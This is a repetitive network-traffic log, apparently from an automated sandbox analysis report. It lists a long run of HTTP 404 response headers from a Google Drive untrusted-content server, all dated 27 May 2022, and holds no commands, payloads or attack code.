h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-oje0L9RWaQhTRD4wFQsMjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-7x-dDGPCK1jzWlmJAVXdXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-owSLexwcwI23LgFNuhQtcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-wx2waV2Lj-f-ALhfHunfqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tyf8AIDhJKLFOFMri0-Uwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HRWE88d19AAGun80LpdvkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Mcne5Xx0myz3cvt4Cyy1nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-t-xEVNIuAmkzXMY8aP5EfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-Zrg8_pabdy69ezfd0byLvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-RVtF3aLbLRDvajVCurLGVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Jwo8YNn7apHNif3dNNwORg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce--M3PXO3RAuR4BKAvWbYB7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2Sq4Ic8OXa_tkloownQlKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-cV3EiRkhzpvUmg1rEmBE6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3TPsn48xaQPKkGwymNjxxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2zZqCf538bpNUCHh-XV8Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: script-src 'report-sample' 'nonce-xLDmZzE8U_Q17M8WWwO6Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-q_WwuXe4XGTluFaUH4GtEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-j4jchXbwVQLmIeHkuwST4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
